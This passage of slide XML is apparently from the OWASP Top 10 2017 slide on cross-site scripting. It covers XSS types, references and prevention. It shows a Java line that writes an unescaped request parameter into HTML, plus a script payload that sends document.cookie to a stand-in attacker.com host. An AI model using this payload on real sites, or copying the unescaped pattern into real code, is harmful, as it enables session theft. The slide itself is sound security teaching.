                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  value=</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 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("CC") + "</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&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The attacker modifies the ‘CC’ parameter in the browser to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </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&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  foo=</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note that attackers can use XSS to defeat any  automated CSRF defense the application might employ. </a:t>
            </a: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XSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Three are three forms of XSS, usually targeting users' browsers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reflected XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Your app or API includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unvalidated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unescaped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> user input as part of HTML output or there is no content security policy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) header. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with a link, or some other attacker controlled page, such as a watering hole attack, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malvertizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, or similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stored XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Your app or API stores </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JavaScript frameworks, single page apps, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typical XSS attacks include session stealing, account takeover, MFA bypass, DIV replacement or defacement (such as trojan login DIVs), attacks against the user's browser such as malicious software downloads, key logging, and other client side attacks.</a:t>
            </a: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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - #3 Encode Data</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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - #4 Validate Data</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6"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard - V5</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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Reflected XSS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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Stored XSS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9"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for DOM XSS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0"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</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1"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</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2"/>
              </a:rPr>
              <a:t>OWASP XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13"/>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4"/>
              </a:rPr>
              <a:t>CWE-79: Improper neutralization of user supplied input</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>: Client-side template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preventing XSS requires separation of untrusted data from active browser content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Use safer frameworks that automatically escape for XSS by design, such as in Ruby 3.0 or React JS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> has details on the required data escaping techniques.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applying context sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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rgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enabling a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a defense in depth mitigating control against XSS, assuming no other vulnerabilities exist that would allow placing malicious code via local file include such as path traversal overwrites, or vulnerable libraries in permitted sources, such as content delivery network or local libraries. </a:t>
            </a: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A7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
